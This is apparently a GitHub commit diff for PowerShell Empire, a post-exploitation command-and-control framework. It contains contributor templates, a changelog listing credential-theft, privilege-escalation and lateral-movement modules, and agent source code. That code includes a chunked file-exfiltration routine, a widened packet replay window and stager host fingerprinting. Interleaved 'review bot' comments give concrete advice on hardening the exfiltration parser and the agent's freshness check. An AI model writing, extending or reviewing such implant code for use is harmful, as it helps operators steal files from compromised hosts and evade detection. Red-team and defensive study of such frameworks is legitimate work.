This repository was archived by the owner on Jan 29, 2020. It is now read-only.

Commit e43fb94

committed
correct conflict in changelog
2 parents 578f93f + 791071c commit e43fb94


69 files changed, +10792 -2378 lines changed

.github/CONTRIBUTING.md

Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
# How To Contribute
2+
3+
Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
4+
5+
6+
## Creating Github Issues
7+
8+
Please first review the existing Empire issues to see if the error was resolved with a fix in the development branch or if we chose not to fix the error for some reason.
9+
10+
The more information you provide in a Github issue the easier it will be for us to track down and fix the problem:
11+
12+
* Please provide the version of Empire you are using.
13+
* Please provide the OS and Python versions that you are using.
14+
* Please describe the expected behavior and the encountered error.
15+
* The more detail the better!
16+
* Include any actions taken just prior to the error.
17+
* Please post a screenshot of the error, a link to a Pastebin dump of the error, or embedded text of the error.
18+
* Any additional information.
19+
20+
21+
## Submitting Modules
22+
23+
* Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
24+
* Base modules on the template at [./modules/template.py](https://github.com/PowerShellEmpire/Empire/blob/dev/lib/modules/template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
25+
* Cite previous work in the **'Comments'** module section.
26+
* If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
27+
* Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
28+
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
29+
* TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
30+
* For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
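Review bot: the link text on line 24 says `./modules/template.py` while the URL it points to is `lib/modules/template.py`; the two should agree (use `lib/modules/template.py`, which is where the dev-branch link actually resolves) so contributors are not sent looking in the wrong directory. Minor: line 17 ("Please post a screenshot...") and line 18 ("Any additional information") mirror the headings of the new ISSUE_TEMPLATE.md, so consider pointing readers to the issue template here instead of maintaining two copies of the same checklist.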

.github/ISSUE_TEMPLATE.md

Lines changed: 13 additions & 0 deletions
@@ -0,0 +1,13 @@
1+
## Empire Version
2+
3+
4+
## OS Information (Linux flavor, Python version)
5+
6+
7+
## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
8+
9+
10+
## Screenshot of error, embedded text output, or Pastebin link to the error
11+
12+
13+
## Any additional information
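Review bot: lines 7 and 10 use an entire instruction sentence as a Markdown heading ("## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better."), which renders as a very long `<h2>` and leaves no body text; a short heading ("## Expected behavior and error") with the guidance as an HTML comment or a plain sentence beneath it keeps the template readable and lets the submitter delete the guidance when filling it in.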

changelog

Lines changed: 55 additions & 1 deletion
@@ -1,11 +1,58 @@
1+
============
2+
3/31/2015 - RELEASE 1.5
3+
============
4+
-Encompasses all changes since the 1.4 tagged release
5+
6+
17
3/31/2016
28
---------
9+
-Merge of Inveigh 1.1 update and privesc/tater
10+
-Updated of Invoke-Mimikatz.ps1 source
311
-Updated mimikatz dlls to version 2.1 alpha
412
-Included modification to suppress cmd.exe when spawned via PTH.
513

6-
1/17/2016
14+
3/30/2016
15+
---------
16+
-Added loading of external modules with 'load /path/modules/'
17+
18+
3/25/2016
19+
---------
20+
-RESTful API modifications
21+
-expanded agent/server epoch check to +/- 12 hours
22+
-stagers now run -sta
23+
24+
3/24/2016
25+
---------
26+
-RESTful API modifications
27+
28+
3/22/2016
29+
---------
30+
-added auth to RESTful API, additional API fixes
31+
32+
3/21/2016
33+
---------
34+
-start of RESTful API implementation
35+
36+
3/19/2016
37+
---------
38+
-PowerView.ps1 update and multiple related module additions
39+
-added github issue templates
40+
-added situational_awareness/network/powerview/get_gpo_computer
41+
42+
3/11/2016
43+
---------
44+
-added privesc/getsystem
45+
-bug fix for Invoke-PsExec and some x64 pointers
46+
47+
3/3/2016
48+
---------
49+
-first pass at stager retry interval
50+
-download chunking modified
51+
52+
2/17/2016
753
---------
854
- '--debug 2' now displays debug information to the console as well as the empire.debug file
55+
-added privesc/mcafee_sitelist
956

1057
1/15/2016
1158
---------
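Review bot: the new release header on line 2 reads "3/31/2015 - RELEASE 1.5", but every entry beneath it is dated 2016 and the 1.4 release further down is dated 12/29/2015, so the year should be 2016. Also, line 10 "-Updated of Invoke-Mimikatz.ps1 source" should read "-Updated Invoke-Mimikatz.ps1 source", and the 3/31/2016 entry on line 7 reuses the release date as a day heading immediately under the release banner, which duplicates the information the banner already gives.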
@@ -21,11 +68,13 @@
2168
----------
2269
-Corrected several bugs in how the workingHours window is handled in the agent
2370

71+
2472
============
2573
12/29/2015 - RELEASE 1.4
2674
============
2775
-Encompasses all changes since 1.3.1 tagged release
2876

77+
2978
12/29/2015
3079
----------
3180
-Added situational_awareness/network/powerview/find_managed_security_groups to integrate @stufus' new code
@@ -121,16 +170,19 @@
121170
---------
122171
-Fixed small bug in TASK_CMD_WAIT response parsing
123172

173+
124174
============
125175
10/30/2015 - RELEASE 1.3.1
126176
============
127177
-Updated reflectivepick dlls to fix bug in injection and dll payload injection
128178

179+
129180
============
130181
10/29/2015 - RELEASE 1.3
131182
============
132183
-Encompasses all changes since 1.2 tagged release
133184

185+
134186
10/26/2015
135187
----------
136188
-Fix for psinject bug due to lack of .NET 4.0 on target.
@@ -168,6 +220,7 @@
168220
--- Six new modules and WAR stager added, /sids option added to golden_ticket
169221
--- Fixed international locale bug with unicode text in agent.ps1
170222

223+
171224
8/29/2015
172225
---------
173226
-HMAC algorithm for packet comms upgraded to use SHA1 instead of MD5
@@ -215,6 +268,7 @@
215268
--- Ability for agents to die after certain number of failed checkins
216269
--- Added ability to easily remove "stale" agents
217270

271+
218272
8/15/2015
219273
---------
220274
-Added modules management/timestomp, trollsploit/process_killer, persistence/elevated/wmi, situational_awareness/network/smbscanner, lateral_movement/invoke_psexec

data/agent/agent.ps1

Lines changed: 41 additions & 7 deletions
@@ -668,12 +668,45 @@ function Invoke-Empire {
668668
}
669669
# file download
670670
elseif($type -eq 41){
671-
try{
672-
$path = Get-Childitem $data | %{$_.FullName}
673-
# read in and send 512kb chunks for as long as the file has more parts
671+
try {
672+
$ChunkSize = 512KB
673+
674+
$Parts = $Data.Split(" ")
675+
676+
if($Parts.Length -gt 1) {
677+
$Path = $Parts[0..($parts.length-2)] -join " "
678+
try {
679+
$ChunkSize = $Parts[-1]/1
680+
if($Parts[-1] -notlike "*b*") {
681+
# if MB/KB not specified, assume KB and adjust accordingly
682+
$ChunkSize = $ChunkSize * 1024
683+
}
684+
}
685+
catch {
686+
# if there's an error converting the last token, assume no
687+
# chunk size is specified and add the last token onto the path
688+
$Path += " $($Parts[-1])"
689+
}
690+
}
691+
else {
692+
$Path = $Data
693+
}
694+
695+
# hardcoded floor/ceiling limits
696+
if($ChunkSize -lt 64KB) {
697+
$ChunkSize = 64KB
698+
}
699+
elseif($ChunkSize -gt 8MB) {
700+
$ChunkSize = 8MB
701+
}
702+
703+
# resolve the complete path
704+
$Path = Get-Childitem $Path | %{$_.FullName}
705+
706+
# read in and send the specified chunk size back for as long as the file has more parts
674707
$Index = 0
675708
do{
676-
$EncodedPart = Get-FilePart -File "$path" -Index $Index
709+
$EncodedPart = Get-FilePart -File "$path" -Index $Index -ChunkSize $ChunkSize
677710

678711
if($EncodedPart){
679712
$data = "{0}|{1}|{2}" -f $Index, $path, $EncodedPart
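Review bot: the chunk-size parsing on lines 674-693 is ambiguous whenever the last whitespace-separated token of a legitimate path is itself numeric (a file named `report 2015`, for example): `$ChunkSize = $Parts[-1]/1` succeeds, the token is silently dropped from `$Path`, and `Get-Childitem` on line 704 then resolves the wrong item or throws into the outer catch, which reports "file does not exist or cannot be accessed" for a file that does exist. Carrying the chunk size as a separately delimited field, or only stripping the trailing token when the shortened path actually exists (`Test-Path`) before committing to it, would remove the guesswork. Two smaller points: the comment on line 681 says "if MB/KB not specified, assume KB", but the code relies on PowerShell's string-to-number conversion already honouring a `KB`/`MB` suffix in `$Parts[-1]/1`, which deserves a comment since it is not obvious why `-notlike "*b*"` is the right test; and the mixed casing (`$parts.length` on line 677, `-File "$path"` on line 709, `$Path` elsewhere) works only because PowerShell variables are case-insensitive, so pick one spelling.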
@@ -699,7 +732,7 @@ function Invoke-Empire {
699732

700733
Encode-Packet -type 40 -data "[*] File download of $path completed"
701734
}
702-
catch{
735+
catch {
703736
Encode-Packet -type 0 -data "file does not exist or cannot be accessed"
704737
}
705738
}
@@ -862,9 +895,10 @@ function Invoke-Empire {
862895
# calculate what the server's epoch should be based on the epoch diff
863896
# this is just done for the first packet in a queue
864897
$ServerEpoch = [int][double]::Parse((Get-Date(Get-Date).ToUniversalTime()-UFormat %s)) - $script:EpochDiff
865-
# if the epoch counter isn't within a +/- 10 minute range (600 seconds)
898+
899+
# if the epoch counter isn't within a +/- 12 hour range (43200 seconds)
866900
# skip processing this packet
867-
if ($counter -lt ($ServerEpoch-600) -or $counter -gt ($ServerEpoch+600)){
901+
if ($counter -lt ($ServerEpoch-43200) -or $counter -gt ($ServerEpoch+43200)){
868902
return
869903
}
870904

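Review bot: widening the accepted counter window from +/-600 s to +/-43200 s on line 901 weakens the freshness check this comparison provides, since a captured packet now stays within the accepted window for up to 12 hours instead of 10 minutes. If the motivation is clock skew between agent and server, note that `$script:EpochDiff` on line 897 already corrects for the offset measured at negotiation, so a narrower tolerance should still work; if 12 hours really is required, pull `43200` into a named variable next to `$script:EpochDiff` with a comment stating the trade-off, rather than repeating the magic number twice in the condition.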
data/agent/stager.ps1

Lines changed: 4 additions & 1 deletion
@@ -67,7 +67,10 @@ function Start-Negotiate{
6767
$p=(gwmi Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress);
6868

6969
# check if the IP is a string or the [IPv4,IPv6] array
70-
$i+='|'+@{$true=$p[0];$false=$p}[$p.Length -lt 6];
70+
$ip = @{$true=$p[0];$false=$p}[$p.Length -lt 6];
71+
if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
72+
$i+="|$ip";
73+
7174
$i+='|'+(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
7275

7376
# detect if we're SYSTEM or otherwise high-integrity
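Review bot: the string-versus-array test `$p.Length -lt 6` on line 70 is a heuristic on character or element count rather than on type. It happens to work for a single dotted-quad string (length 8, so `$p` itself is used) and for a short `[IPv4, IPv6]` array (length 2, so `$p[0]` is used), but on a host with six or more addresses `$ip` becomes the whole array, and `$ip.trim()` on line 71 then fails on PowerShell v2, which has no member enumeration over arrays, outside any try block. Testing `$p -is [array]` (or `$p -is [string]`) states the intent directly; the `!$ip` guard only protects the null case. The new `0.0.0.0` fallback is a good addition, since the previous line produced an empty field that the server had to special-case.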
